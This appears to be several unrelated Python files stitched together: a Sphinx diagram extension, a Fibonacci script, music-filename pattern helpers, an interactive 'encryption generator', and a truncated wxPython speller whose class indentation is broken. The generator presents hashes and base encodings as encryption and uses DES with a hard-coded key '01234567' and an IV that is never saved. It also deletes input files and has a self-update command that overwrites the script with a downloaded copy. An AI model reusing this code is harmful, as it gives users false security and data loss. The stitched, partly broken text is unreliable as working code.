    full-size image, and a clickable image map."""
    image = node.to_drawer('PNG', self.builder)
    # only draw when the cached output file is missing
    if not os.path.isfile(image.filename):
        image.draw()
        image.save()
    # align
    if 'align' in node['options']:
        align = node['options']['align']
        self.body.append('<div align="%s" class="align-%s">' % (align, align))
        self.context.append('</div>\n')
    else:
        self.body.append('<div>')
        # NOTE(review): no trailing '\n' here, unlike the SVG renderer and
        # the aligned branch above — confirm whether this is intentional.
        self.context.append('</div>')
    # link to original image (only when the display size differs)
    relpath = node.get_relpath('PNG', self.builder)
    if 'width' in node['options'] or 'height' in node['options'] or 'scale' in node['options']:
        self.body.append('<a class="reference internal image-reference" href="%s">' % relpath)
        self.context.append('</a>')
    else:
        self.context.append('')
    # <img> tag, scaled per the directive options
    original_size = image.pagesize()
    resized = original_size.resize(**node['options'])
    img_attr = dict(src=relpath,
                    width=resized.width,
                    height=resized.height)
    # clickable image map when any diagram node carries a hyperlink
    if any(node.href for node in image.nodes):
        img_attr['usemap'] = "#map_%d" % id(image)
        width_ratio = float(resized.width) / original_size.width
        height_ratio = float(resized.height) / original_size.height
        html_render_clickablemap(self, image, width_ratio, height_ratio)
    if 'alt' in node['options']:
        img_attr['alt'] = node['options']['alt']
    self.body.append(self.starttag(node, 'img', '', empty=True, **img_attr))
def html_visit_nwdiag(self, node):
    """HTML visitor: render *node* as SVG or PNG; on failure warn and
    skip the node instead of aborting the build."""
    try:
        fmt = get_image_format_for(self.builder)
        renderer = html_render_svg if fmt.upper() == 'SVG' else html_render_png
        renderer(self, node)
    except UnicodeEncodeError:
        if self.builder.config.nwdiag_debug:
            traceback.print_exc()
        self.builder.warn("nwdiag error: UnicodeEncodeError caught "
                          "(check your font settings)")
        raise nodes.SkipNode
    except Exception as exc:
        if self.builder.config.nwdiag_debug:
            traceback.print_exc()
        self.builder.warn('dot code %r: %s' % (node['code'], str(exc)))
        raise nodes.SkipNode
def html_depart_nwdiag(self, node):
    """Close the two wrappers (link, div) opened by the visit handler."""
    for _ in range(2):
        self.body.append(self.context.pop())
def get_image_format_for(builder):
    """Choose the diagram output format for *builder*.

    HTML and LaTeX builders are configurable (the deprecated
    ``nwdiag_tex_image_format`` still wins for LaTeX); everything else
    gets PNG.  Raises ValueError for unsupported formats and ImportError
    when PDF output is requested without reportlab installed.
    """
    if builder.format == 'html':
        fmt = builder.config.nwdiag_html_image_format.upper()
    elif builder.format == 'latex':
        deprecated = builder.config.nwdiag_tex_image_format
        fmt = (deprecated or builder.config.nwdiag_latex_image_format).upper()
    else:
        fmt = 'PNG'
    if fmt.upper() not in ('PNG', 'PDF', 'SVG'):
        raise ValueError('unknown format: %s' % fmt)
    if fmt.upper() == 'PDF':
        try:
            import reportlab  # NOQA: importing test
        except ImportError:
            raise ImportError('Could not output PDF format. Install reportlab.')
    return fmt
def on_builder_inited(self):
    """Sphinx ``builder-inited`` hook: warn about deprecated options and
    initialize the module-global font map used by all drawers.

    Fix: the original used bare ``except:`` clauses, which also swallow
    SystemExit/KeyboardInterrupt; both are narrowed to ``Exception``.
    """
    # show deprecated message
    if self.builder.config.nwdiag_tex_image_format:
        self.builder.warn('nwdiag_tex_image_format is deprecated. Use nwdiag_latex_image_format.')
    # initialize fontmap
    global fontmap
    try:
        fontmappath = self.builder.config.nwdiag_fontmap
        fontmap = FontMap(fontmappath)
    except Exception:  # bad/missing fontmap file: fall back to defaults
        fontmap = FontMap(None)
    try:
        fontpath = self.builder.config.nwdiag_fontpath
        if isinstance(fontpath, string_types):
            fontpath = [fontpath]
        if fontpath:
            config = namedtuple('Config', 'font')(fontpath)
            fontpath = detectfont(config)
            fontmap.set_default_font(fontpath)
    except Exception:  # font detection is best-effort; keep defaults
        pass
def on_doctree_resolved(self, doctree, docname):
    """Sphinx ``doctree-resolved`` hook: replace diagram nodes with
    rendered image nodes for non-HTML builders.

    HTML is skipped here because it is handled by the
    html_visit_nwdiag/html_depart_nwdiag translator callbacks.
    """
    if self.builder.format == 'html':
        return
    try:
        image_format = get_image_format_for(self.builder)
    except Exception as exc:
        if self.builder.config.nwdiag_debug:
            traceback.print_exc()
        self.builder.warn('nwdiag error: %s' % exc)
        # no usable format: drop every diagram node from the tree
        for node in doctree.traverse(nwdiag_node):
            node.parent.remove(node)
        return
    for node in doctree.traverse(nwdiag_node):
        try:
            relfn = node.get_relpath(image_format, self.builder)
            image = node.to_drawer(image_format, self.builder)
            # draw only when the cached output file is missing
            if not os.path.isfile(image.filename):
                image.draw()
                image.save()
            image = nodes.image(uri=image.filename, candidates={'*': relfn}, **node['options'])
            node.parent.replace(node, image)
        except Exception as exc:
            if self.builder.config.nwdiag_debug:
                traceback.print_exc()
            self.builder.warn('dot code %r: %s' % (node['code'], str(exc)))
            # a broken diagram is removed rather than failing the build
            node.parent.remove(node)
def setup(app):
    """Register the nwdiag node, directive, config values and event hooks
    with the Sphinx application."""
    app.add_node(nwdiag_node,
                 html=(html_visit_nwdiag, html_depart_nwdiag))
    app.add_directive('nwdiag', Nwdiag)
    config_values = [
        ('nwdiag_fontpath', None),
        ('nwdiag_fontmap', None),
        ('nwdiag_antialias', False),
        ('nwdiag_debug', False),
        ('nwdiag_html_image_format', 'PNG'),
        ('nwdiag_tex_image_format', None),  # backward compatibility for 0.6.1
        ('nwdiag_latex_image_format', 'PNG'),
    ]
    for name, default in config_values:
        app.add_config_value(name, default, 'html')
    app.connect("builder-inited", on_builder_inited)
    app.connect("doctree-resolved", on_doctree_resolved)
|
import sys
def fib(n):
    """Return the Fibonacci number at position n, where fib(1) == 0 and
    fib(2) == 1 (i.e. the (n-1)-th Fibonacci number).

    Iterative implementation: O(n) time, O(1) space, replacing the
    original exponential double recursion.  The n <= 2 base case
    (including the original's behavior for n <= 0) is preserved exactly.
    """
    if n <= 2:
        return n - 1
    a, b = 1, 1  # fib(2), fib(3)
    for _ in range(n - 3):
        a, b = b, a + b
    return b
if __name__ == '__main__':
    # Guard so importing this module does not run the CLI.  Parenthesized
    # print of a single value is valid under both Python 2 and Python 3
    # (the original print statements were Python-2-only).
    if len(sys.argv) == 2:
        print(fib(int(sys.argv[1])))
    else:
        print("Usage : " + sys.argv[0] + " <term required>")
|
import consts
import urlparse
import urllib
import os.path
from errors import PatternException
def expand_file(pattern, metadata):
    """
    Expands the pattern to a file name according to the infomation of a music
    The following are supported place holder in the pattern:
    - %t: Title of the track. 'title' in metadata
    - %p: Performer (artist) of the music. 'artist' in metadata
    - %a: Album of the music. 'album' in metadata
    - %n: Track number of the music. 'tracknumber' in metadata
    - %f: Filename without extension of the music. 'location' in metadata.
    - %%: The `%' punctuation
    Arguments:
    - `pattern`: The pattern to expand.
    - `metadata`: A dict representing metadata. Useful keys are listed above.
    If the pattern cannot be expand, raise an PatternException. Otherwise
    return the expended pattern.
    >>> metadata = {'artist': 'Foo',
    ...             'title': 'Bar',
    ...             'tracknumber': '1',
    ...             'album': 'Album',
    ...             'location': 'file:///%E6%AD%8C%E6%9B%B2/%E7%9A%84/%E5%9C%B0%E5%9D%80.mp3'}
    >>> expand_file('%p - %t', metadata)
    'Foo - Bar'
    >>> expand_file('foobar', metadata)
    'foobar'
    >>> print expand_file('name is %f :)', metadata)
    name is 地址 :)
    >>> expand_file('%something else', metadata)
    '%something else'
    >>> expand_file('%%a - %%t', metadata)
    '%a - %t'
    >>> expand_file('%%%', metadata)
    '%%'
    >>> expand_file('%n - %a:%p,%t', metadata)
    '1 - Album:Foo,Bar'
    >>> expand_file('%t', {})
    Traceback (most recent call last):
        ...
    PatternException: 'title not in metadata'
    """
    # Fixes vs. the original: metadata is documented (and used by the
    # doctests) as a dict, so values are read with .get() instead of
    # attribute access; and '%n' maps to 'tracknumber', matching the
    # docstring (the original looked up a nonexistent 'tracknum' key).
    keys = {'t': 'title',
            'p': 'artist',
            'a': 'album',
            'n': 'tracknumber',
            }
    start = 0
    parts = []
    while start < len(pattern):
        end = pattern.find('%', start)
        if end > -1:
            parts.append(pattern[start:end])
            has_tag = False
            if end + 1 < len(pattern):
                tag = pattern[end + 1]
                if tag == '%':
                    has_tag = True
                    parts.append('%')
                elif tag == 'f':
                    location = metadata.get('location')
                    if not location:
                        raise PatternException('Location not found in metadata')
                    uri = urlparse.urlparse(location)
                    if uri.scheme != '' and not uri.scheme in ['file']:
                        raise PatternException('Unsupported file scheme %s' % uri.scheme)
                    if uri.scheme == '':
                        path = uri.path
                    else:
                        path = urllib.url2pathname(uri.path)
                    basename = os.path.basename(path)
                    root, ext = os.path.splitext(basename)
                    has_tag = True
                    parts.append(root)
                elif tag in keys:
                    value = metadata.get(keys[tag])
                    if not value:
                        raise PatternException('%s not in metadata' % keys[tag])
                    has_tag = True
                    parts.append(value)
            if has_tag:
                start = end + 2
            else:
                # Unknown tag: keep the literal '%' and continue after it.
                start = end + 1
                parts.append('%')
        else:
            parts.append(pattern[start:])
            break
    return ''.join(parts)
def expand_path(pattern, metadata):
    """
    Expands the pattern to a directory path according to the infomation of a music
    The pattern can be one of the three forms:
    - begin with `/': the path is an absolute path and will not be expanded
    - begin with `~/': the path is an relative path and the `~' wiil be expanded to
      the absolute path of the user's home directory
    - `%': the path will be expanded to the directory of the music file according to
      its URI. ``location`` key is used in metadata
    Arguments:
    - `pattern`: The pattern to expand.
    - `metadata`: A dict representing metadata. Useful keys are listed above.
    If the pattern cannot be expand, raise an PatternException. Otherwise
    return the expended pattern.
    >>> expand_path('%', {'location': 'file:///tmp/a.lrc'})
    '/tmp'
    >>> expand_path('%foo', {'location': 'file:///tmp/a.lrc'})
    '%foo'
    >>> expand_path('/bar', {})
    '/bar'
    >>> expand_path('%', {'Title': 'hello'})
    Traceback (most recent call last):
        ...
    PatternException: 'Location not found in metadata'
    """
    if pattern == '%':
        # Fix vs. the original: metadata is a dict (see doctests), so the
        # location must be read with .get(), not attribute access.
        location = metadata.get('location')
        if not location:
            raise PatternException('Location not found in metadata')
        uri = urlparse.urlparse(location)
        if not uri.scheme in ['file']:
            raise PatternException('Unsupported file scheme %s' % uri.scheme)
        path = urllib.url2pathname(uri.path)
        return os.path.dirname(path)
    return os.path.expanduser(pattern)
if __name__ == '__main__':
    # Run the doctests embedded in this module's docstrings.
    import doctest
    doctest.testmod()
|
import os
import sys
import time
import base64
import urllib
import hashlib
import subprocess
from datetime import date
from datetime import datetime
from Crypto.Cipher import DES
from Crypto import Random
# --- banner / startup -------------------------------------------------------
date=date.today()
now=datetime.now()
# clear the terminal: 'cls' on Windows, 'clear' elsewhere
if os.name in ['nt','win32']:
    os.system('cls')
else:
    os.system('clear')
print "[*] Author Netuser [*]"
print "[*] encryption generator [*]"
print "[*] date :",date," [*]"
print
print "[*] Encrypt With Strong Crypto is Coming soon"
back = 'back'
# --- interactive menu loop --------------------------------------------------
# Each command is dispatched by assigning a candidate string to menu_item
# and comparing it to the user's input; unrecognized input just loops.
while True:
    try:
        menu=raw_input('\n[*] encrypt or decrypt $ ')
        menu_item="update"
        if menu_item == menu:
            # self-update: overwrite this script with the upstream copy
            print "[*] Updating Databases Information .... "
            url=urllib.urlretrieve("https://raw.githubusercontent.com/P1d0f/encryptGen/master/encryption-generator.py","encryption-generator.py")
            print "[*] Update Succesfully"
            sys.exit()
        menu_item="help"
        if menu == menu_item:
            print """
			you just type encrypt or decrypt
			example :
				encrypt = encrypt or decrypt $ encrypt (enter)
				decrypt = encrypt or decrypt $ decrypt (enter)
			"""
        menu_item="encrypt"
        if menu == menu_item:
            print
            print "----> md5"
            print "----> sha1"
            print "----> sha224"
            print "----> sha256"
            print "----> sha384"
            print "----> sha512"
            print "----> base16"
            print "----> base32"
            print "----> base64"
            print "----> cryptoDES"
            print
            raw=raw_input('[*] type and choice one $ ')
            menu_item="exit"
            if raw == menu_item:
                print "[*] thanks for shopping"
                sys.exit()
            menu_item="cryptoDES"
            if menu_item == raw:
                # NOTE(review): the IV is random and never stored, so the
                # decrypt branch (which generates a *different* IV) cannot
                # restore the first cipher block — confirm and persist the IV.
                telo=raw_input('[*] your text $ ')
                iv=Random.get_random_bytes(8)
                des1=DES.new('01234567', DES.MODE_CFB, iv)
                des2=DES.new('01234567', DES.MODE_CFB, iv)
                text=telo
                cipher_text=des2.encrypt(text)
                nama_file=open('text.encrypt','w')
                nama_file.writelines(cipher_text)
                nama_file.close()
                time.sleep(2)
                for i in(5,4,3,2,1):
                    print "[*] encrypted at",now
                print "\n[*] saved into text.encrypt"
            menu_item="base16"
            if menu_item == raw:
                telo=raw_input('[*] text $ ')
                base16=base64.b16encode('%s' % (telo))
                for i in(5,4,3,2,1):
                    print "[*] encoded at",now
                print "\n[*] result :",base16
            menu_item="sha224"
            if menu_item == raw:
                telo=raw_input('[*] text $ ')
                sha224=hashlib.sha224('%s' % (telo)).hexdigest()
                for i in(5,4,3,2,1):
                    print "[*] encrypted at",now
                print "\n[*] result :",sha224
            menu_item="sha384"
            if menu_item == raw:
                telo=raw_input('[*] text $ ')
                sha384=hashlib.sha384('%s' % (telo)).hexdigest()
                for i in(5,4,3,2,1):
                    print "[*] encrypted at",now
                print "\n[*] result :",sha384
            menu_item="sha512"
            if menu_item == raw:
                telo=raw_input('[*] text $ ')
                sha512=hashlib.sha512('%s' % (telo)).hexdigest()
                for i in(5,4,3,2,1):
                    print "[*] encrypted at",now
                print "\n[*] result :",sha512
            menu_item="base64"
            if menu_item == raw:
                telo=raw_input('[*] text $ ')
                # NOTE(review): this rebinds the name 'base64' to a str,
                # shadowing the module — any later base64.* call in this
                # session will raise AttributeError; rename the variable.
                base64=base64.b64encode('%s' % (telo))
                for i in(5,4,3,2,1):
                    print "[*] encoded at",now
                print "\n[*] result :",base64
            menu_item="md5"
            if menu_item == raw:
                telo=raw_input('[*] text $ ')
                md5=hashlib.md5('%s' % (telo)).hexdigest()
                for i in(1,2,3,4,5):
                    print "[*] encrypted at",now
                print "\n[*] result :",md5
            menu_item="sha256"
            if menu_item == raw:
                telo=raw_input('[*] text $ ')
                sha256=hashlib.sha256('%s' % (telo)).hexdigest()
                print
                for i in(1,2,3,4,5):
                    print "[*] encrypted at",now
                print "\n[*] result :",sha256
            menu_item="sha1"
            if menu_item == raw:
                telo=raw_input('[*] text $ ')
                sha1=hashlib.sha1('%s' % (telo)).hexdigest()
                print
                for i in(1,2,3,4,5):
                    print "[*] encrypted at",now
                print "\n[*] result :",sha1
            menu_item="base32"
            if menu_item == raw:
                # base32 supports either direct text or whole-file encoding
                ff=raw_input('[*] text or file $ ')
                menu_fuck="text"
                if menu_fuck == ff:
                    telo=raw_input('text $ ')
                    base32=base64.b32encode('%s' % (telo))
                    print
                    for i in(1,2,3,4,5):
                        print "[*] encoded at",now
                    print "\n[*] result :",base32
                menu_ss="file"
                if menu_ss == ff:
                    try:
                        print "[*] WARNING : if you encrypt this file your file original will be remove !"
                        fileno=raw_input('\n[*] file to encrypt $ ')
                        baca=open('%s' % (fileno), 'r')
                        ss=baca.read()
                        decrypt=base64.b32encode(ss)
                        simpan=open('text.enc','w')
                        simpan.writelines(decrypt)
                        simpan.close()
                        time.sleep(2)
                        for i in(5,4,3,2,1):
                            print "[*] encoded at",now
                        print "\n[*] saved to text.enc"
                        # the original file is deleted after encoding
                        os.remove(fileno)
                    except IOError:
                        print "\n[*] no file found",fileno
                        sys.exit()
        menu_telo="decrypt"
        if menu_telo == menu:
            print
            print "----> base16"
            print "----> base32"
            print "----> base64"
            print "----> cryptoDES"
            print
            oke=raw_input('[*] type and choice one $ ')
            menu_telo="cryptoDES"
            if menu_telo == oke:
                try:
                    telo=raw_input('[*] file.encrypt : ')
                    # NOTE(review): fresh random IV here differs from the one
                    # used at encryption time — see note in the encrypt branch.
                    iv=Random.get_random_bytes(8)
                    des1=DES.new('01234567', DES.MODE_CFB, iv)
                    des2=DES.new('01234567', DES.MODE_CFB, iv)
                    nama_file=open('%s' % (telo),'r')
                    ss=nama_file.read()
                    decs=des2.decrypt(ss)
                    save1=open('text.decrypt','w')
                    save1.writelines(decs)
                    save1.close()
                    time.sleep(2)
                    for i in(5,4,3,2,1):
                        print "[*] decrypted at",now
                    print "\n[*] saved file text.decrypt"
                except IOError:
                    print "\n[*] Not found file encrypt",telo
            menu_telo="base16"
            if oke == menu_telo:
                raw1=raw_input('[*] text base16 $ ')
                dec16=base64.b16decode('%s' % (raw1))
                for i in(5,4,3,2,1):
                    print "[*] decoded at",now
                print "\n[*] result :",dec16
            menu_telo="base32"
            if oke == menu_telo:
                ss=raw_input('[*] text or file $ ')
                menu_gg="text"
                if menu_gg == ss:
                    raw2=raw_input('[*] text base32 $ ')
                    print
                    dec32=base64.b32decode('%s' % (raw2))
                    for i in(5,4,3,2,1):
                        print "[*] decoded at",now
                    print "\n[*] result :",dec32
                menu_hh="file"
                if menu_hh == ss:
                    try:
                        fileno=raw_input('[*] file text.enc $ ')
                        print
                        fuck=open('%s' % (fileno), 'r')
                        anjir=fuck.read()
                        dec43=base64.b32decode(anjir)
                        telo=open('text.dec','w')
                        telo.writelines(dec43)
                        telo.close()
                        time.sleep(2)
                        for i in(5,4,3,2,1):
                            print "[*] decoded at",now
                        print "\n[*] save file text.dec"
                        os.remove(fileno)
                    except:
                        print "[*] Not found file enc "
            menu_telo="base64" #this is Bug Sorry
            if oke == menu_telo:#
                raw3=raw_input('[*] text base64 $ ')#
                dec64=base64.b64decode('%s' % (raw3))#
                for i in (5,4,3,2,1):#
                    print "[*] decoded at",now#
                print "\n[*] result :",dec64#
            menu_telo="exit"
            if menu_telo == oke:
                print "[*] thanks for shopping"
                sys.exit()
        menu_item="exit"
        if menu == menu_item:
            print "[*] thanks for shopping"
            sys.exit()
    except KeyboardInterrupt:
        print "\n[*] ctrl+c active "
        sys.exit()
|
import wxversion
wxversion.select( '2.8' )
import glob, os, time
import wx, alsaaudio
import wx.lib.buttons as bt
from pymouse import PyMouse
from string import maketrans
from pygame import mixer
import subprocess as sp
import shlex
import numpy as np
from random import shuffle
class speller( wx.Frame ):
def __init__(self, parent):
self.parent = parent
self.initializeParameters( )
self.initializeBitmaps( )
self.createGui( )
#-------------------------------------------------------------------------
    def initializeParameters(self):
        """Read the three on-disk parameter files and set up all state
        (colors, timings, labels, sounds) used by the speller board."""
        self.pathToEPlatform = './'
        # Parameter files are simple 'name = value' lines; unknown
        # non-blank lines trigger the (Polish) error message and defaults.
        with open( self.pathToEPlatform + 'spellerParameters', 'r' ) as parametersFile:
            for line in parametersFile:
                if line[ :line.find('=')-1 ] == 'polishLettersColour':
                    self.polishLettersColour = line[ line.rfind('=')+2:-1 ]
                elif line[ :line.find('=')-1 ] == 'voice':
                    pass
                elif line[ :line.find('=')-1 ] == 'vowelColour':
                    self.vowelColour= line[ line.rfind('=')+2:-1 ]
                elif not line.isspace( ):
                    # malformed line: report it and fall back to defaults
                    print '\nNiewłaściwie opisany parametr. Błąd w linii:\n%s' % line
                    self.vowelColour = 'red'
                    self.polishLettersColour = 'blue'
        # parametersCW entries are currently ignored (kept for file
        # compatibility with the other activities).
        with open( self.pathToEPlatform + 'parametersCW', 'r' ) as parametersFile:
            for line in parametersFile:
                if line[ :line.find('=')-1 ] == 'textSize':
                    pass
                elif line[ :line.find('=')-1 ] == 'checkTime':
                    pass
                elif line[ :line.find('=')-1 ] == 'maxPoints':
                    pass
                elif line[ :line.find('=')-1 ] == 'colorGrat':
                    pass
                elif line[ :line.find('=')-1 ] == 'colorNiest':
                    pass
                elif line[ :line.find('=')-1 ] == 'ileLuk':
                    pass
                    #self.ileLuk= int(line[ line.rfind('=')+2:-1 ])
                elif not line.isspace( ):
                    print 'Niewłaściwie opisane parametry'
                    print 'Błąd w linii', line
                    #self.ileLuk=2
        # shared platform parameters (timing and colour scheme)
        with open( self.pathToEPlatform + 'parameters', 'r' ) as parametersFile:
            for line in parametersFile:
                if line[ :line.find('=')-1 ] == 'timeGap':
                    self.timeGap = int( line[ line.rfind('=')+2:-1 ] )
                elif line[ :line.find('=')-1 ] == 'backgroundColour':
                    self.backgroundColour = line[ line.rfind('=')+2:-1 ]
                elif line[ :line.find('=')-1 ] == 'textColour':
                    self.textColour = line[ line.rfind('=')+2:-1 ]
                elif line[ :line.find('=')-1 ] == 'scanningColour':
                    self.scanningColour = line[ line.rfind('=')+2:-1 ]
                elif line[ :line.find('=')-1 ] == 'selectionColour':
                    self.selectionColour = line[ line.rfind('=')+2:-1 ]
                elif line[ :line.find('=')-1 ] == 'musicVolume':
                    pass
                elif line[ :line.find('=')-1 ] == 'filmVolume':
                    pass
                elif not line.isspace( ):
                    print '\nNiewłaściwie opisany parametr. Błąd w linii:\n%s' % line
                    self.timeGap = 1500
                    self.backgroundColour = 'white'
                    self.textColour = 'black'
                    self.scanningColour = '#E7FAFD'
                    self.selectionColour = '#9EE4EF'
        # two keyboard layouts: letters (+icon column) and digits/symbols
        self.labels = [ 'a e b c d f g h i o j k l m n p u y r s t w z SPECIAL_CHARACTERS DELETE TRASH CHECK ORISPEAK SPEAK EXIT'.split( ), '1 2 3 4 5 6 7 8 9 0 + - * / = % $ & . , ; : " ? ! @ # ( ) [ ] { } < > ~ DELETE TRASH CHECK ORISPEAK SPEAK EXIT'.split( ) ]
        self.colouredLabels = [ 'a','e','i','o','u','y']
        self.winWidth, self.winHeight = wx.DisplaySize( )
        self.voice=False
        # the word to spell comes from the parent activity
        self.slowo=self.parent.word
        self.ileLiter =len(self.slowo)
        #if self.ileLuk >=len(self.slowo):
            #self.ileLuk=len(self.slowo)-1
        self.numberOfRows = [4, 5 ]
        self.numberOfColumns = [ 8, 9 ]
        #self.flag = 'row'
        #self.rowIteration = 0
        #self.columnIteration = 0
        #self.countRows = 0
        #self.countColumns = 0
        self.kolejnyKrok=0
        #self.maxNumberOfColumns = 2
        self.numberOfPresses = 1
        self.subSizerNumber = 0
        self.mouseCursor = PyMouse( )
        # load the typewriter sound effects and per-letter phone sounds
        mixer.init( )
        self.typewriterKeySound = mixer.Sound( self.pathToEPlatform+'sounds/typewriter_key.wav' )
        self.typewriterForwardSound = mixer.Sound( self.pathToEPlatform+'sounds/typewriter_forward.wav' )
        self.typewriterSpaceSound = mixer.Sound( self.pathToEPlatform+'sounds/typewriter_space.wav' )
        self.phones = glob.glob( self.pathToEPlatform+'sounds/phone/*' )
        self.phoneLabels = [ item[ item.rfind( '/' )+1 : item.rfind( '_' ) ] for item in self.phones ]
        # NOTE(review): 'for self.sound in self.phones' leaks the loop
        # variable onto the instance — confirm nothing relies on self.sound.
        self.sounds = [ mixer.Sound( self.sound ) for self.sound in self.phones ]
        self.parent.SetBackgroundColour( 'dark grey' )
#-------------------------------------------------------------------------
    def initializeBitmaps(self):
        """Load button icons for the last 7 letter-board keys and the last
        6 symbol-board keys, keyed by their label string."""
        self.path=self.pathToEPlatform+'multimedia/'
        labelFiles = [ file for file in [ self.path+'icons/speller/special_characters.png', self.path+'icons/speller/DELETE.png', self.path+'icons/speller/TRASH.png', self.path+'icons/speller/CHECK.png',self.path+'icons/speller/ORISPEAK.png', self.path+'icons/speller/SPEAK.png', self.path+'icons/speller/exit.png', ] ]
        self.labelBitmaps = { }
        # indexes of the 7 trailing icon labels on the letter layout
        labelBitmapIndex = [ self.labels[ 0 ].index( self.labels[ 0 ][ -7 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -6 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -5 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -4 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -3 ] ),self.labels[ 0 ].index( self.labels[ 0 ][ -2 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -1 ] ) ]
        for labelFilesIndex, labelIndex in enumerate( labelBitmapIndex ):
            self.labelBitmaps[ self.labels[ 0 ][ labelIndex ] ] = wx.BitmapFromImage( wx.ImageFromStream( open( labelFiles[ labelFilesIndex ], 'rb' )) )
        self.labelBitmaps2 = { }
        # the symbol layout has no SPECIAL_CHARACTERS key, so only 6 icons
        # (note labelFiles[1:] skips special_characters.png below)
        labelBitmapIndex2 = [ self.labels[ 1 ].index( self.labels[ 1 ][ -6 ] ), self.labels[ 1 ].index( self.labels[ 1 ][ -5 ] ), self.labels[ 1 ].index( self.labels[ 1 ][ -4 ] ), self.labels[ 1 ].index( self.labels[ 1 ][ -3 ] ),self.labels[ 1 ].index( self.labels[ 1 ][ -2 ] ), self.labels[ 1 ].index( self.labels[ 1 ][ -1 ] ) ]
        for labelFilesIndex2, labelIndex2 in enumerate( labelBitmapIndex2 ):
            self.labelBitmaps2[ self.labels[ 1 ][ labelIndex2 ] ] = wx.BitmapFromImage( wx.ImageFromStream( open( labelFiles[ 1: ][ labelFilesIndex2 ], 'rb' )) )
#-------------------------------------------------------------------------
    def createGui(self):
        """Build the text field and the two keyboard grids.

        The letter grid shows the target word's letters (shuffled) plus
        one random decoy enabled; all other keys are greyed out.
        """
        self.textField = wx.TextCtrl( self.parent, style = wx.TE_LEFT|wx.TE_RICH2, size = ( self.winWidth, 0.2 * self.winHeight ) )
        self.textField.SetFont( wx.Font( 60, wx.SWISS, wx.NORMAL, wx.NORMAL ) )
        self.parent.mainSizer.Add( self.textField, flag = wx.EXPAND | wx.TOP | wx.BOTTOM, border = 3 )
        self.subSizers = [ ]
        subSizer = wx.GridBagSizer( 3, 3 )
        # indexes (into the letter layout) of the word's letters, shuffled
        self.pomieszane=[]
        for i in self.slowo:
            self.pomieszane.append(self.labels[0].index(i))
        shuffle(self.pomieszane)
        #print self.pomieszane
        # drop duplicate letter positions
        for litera in self.pomieszane:
            if self.pomieszane.count(litera) > 1:
                self.pomieszane.remove(litera)
        # add one random decoy key that is NOT one of the word's letters
        zakres=(self.numberOfRows[0]-1)* self.numberOfColumns[0] -1
        print zakres
        dodaj=np.random.randint(0,zakres,1)[0]
        while dodaj in self.pomieszane:
            dodaj=np.random.randint(0,zakres,1)[0]
        self.pomieszane.append(dodaj)
        # write the shuffled word's letters onto the chosen key positions
        slowoList=list(self.slowo)
        shuffle(slowoList)
        zmieszane_slowo= ''.join(slowoList)
        #print zmieszane_slowo
        for i in self.pomieszane:
            self.labels[0][i]=zmieszane_slowo[-1]
            zmieszane_slowo=zmieszane_slowo[:-1]
        self.pomieszane.sort()
        ile=0
        # letter keys: only positions in self.pomieszane are active/coloured
        for index_1, item in enumerate( self.labels[ 0 ][ :-7 ] ):
            ile+=1
            b = bt.GenButton( self.parent, -1, item , name = item+str(ile), size = ( 0.985*self.winWidth / self.numberOfColumns[ 0 ], 0.79 * self.winHeight / self.numberOfRows[ 0 ] ) )
            b.SetFont( wx.Font( 100, wx.FONTFAMILY_ROMAN, wx.FONTWEIGHT_LIGHT, False ) )
            b.SetBezelWidth( 3 )
            if index_1 not in self.pomieszane:
                b.SetBackgroundColour( 'grey' )
            else:
                b.SetBackgroundColour( self.backgroundColour )
            if item in self.colouredLabels and self.vowelColour != 'False':
                if index_1 not in self.pomieszane:
                    b.SetForegroundColour( 'grey' )
                else:
                    b.SetForegroundColour( self.vowelColour )
            else:
                if index_1 not in self.pomieszane:
                    b.SetForegroundColour( 'grey' )
                else:
                    b.SetForegroundColour( self.textColour )
            b.Bind( wx.EVT_LEFT_DOWN, self.onPress )
            subSizer.Add( b, ( index_1 / self.numberOfColumns[ 0 ], index_1 % self.numberOfColumns[ 0 ] ), wx.DefaultSpan, wx.EXPAND )
        # trailing icon keys; SPECIAL_CHARACTERS stays disabled, CHECK
        # (index_2 == 3) spans 3 columns
        for index_2, item in enumerate( self.labels[ 0 ][ -7 : ] ):
            if item == 'SPECIAL_CHARACTERS':
                b = bt.GenButton( self.parent, -1, item, name = item, size = ( 0.985*self.winWidth / self.numberOfColumns[ 0 ], 0.79 * self.winHeight / self.numberOfRows[ 0 ] ) )
                b.SetFont( wx.Font( 100, wx.FONTFAMILY_ROMAN, wx.FONTWEIGHT_LIGHT, False ) )
                b.SetForegroundColour( 'grey' )
                b.SetBackgroundColour( 'grey' )
            else:
                b = bt.GenBitmapButton( self.parent, -1, bitmap = self.labelBitmaps[ item ] )
                b.SetBackgroundColour( self.backgroundColour )
            b.SetBezelWidth( 3 )
            b.Bind( wx.EVT_LEFT_DOWN, self.onPress )
            if index_2==3:
                subSizer.Add( b, ( ( index_1 + index_2 +1) / self.numberOfColumns[ 0 ], ( index_1 + index_2+1 ) % self.numberOfColumns[ 0 ] ), (1,3), wx.EXPAND )
            elif index_2>3:
                subSizer.Add( b, ( ( index_1 + index_2 +3) / self.numberOfColumns[ 0 ], ( index_1 + index_2 +3) % self.numberOfColumns[ 0 ] ), wx.DefaultSpan, wx.EXPAND )
            else:
                subSizer.Add( b, ( ( index_1 + index_2+1 ) / self.numberOfColumns[ 0 ], ( index_1 + index_2 +1) % self.numberOfColumns[ 0 ] ), wx.DefaultSpan, wx.EXPAND )
        self.subSizers.append( subSizer )
        self.parent.mainSizer.Add( self.subSizers[ 0 ], proportion = 1, flag = wx.EXPAND )
        self.parent.SetSizer( self.parent.mainSizer )
        # second grid: digits/symbols layout (initially hidden)
        subSizer2 = wx.GridBagSizer( 3, 3 )
        for index_1, item in enumerate( self.labels[ 1 ][ :-6 ] ):
            b = bt.GenButton( self.parent, -1, item, name = item, size = ( 0.985*self.winWidth / self.numberOfColumns[ 1 ], 0.75 * self.winHeight / self.numberOfRows[ 1 ] ) )
            b.SetFont( wx.Font( 100, wx.FONTFAMILY_ROMAN, wx.FONTWEIGHT_LIGHT, False ) )
            b.SetBezelWidth( 3 )
            b.SetBackgroundColour( self.backgroundColour )
            b.SetForegroundColour( self.textColour )
            b.Bind( wx.EVT_LEFT_DOWN, self.onPress )
            subSizer2.Add( b, ( index_1 / self.numberOfColumns[ 1 ], index_1 % self.numberOfColumns[ 1 ] ), wx.DefaultSpan, wx.EXPAND )
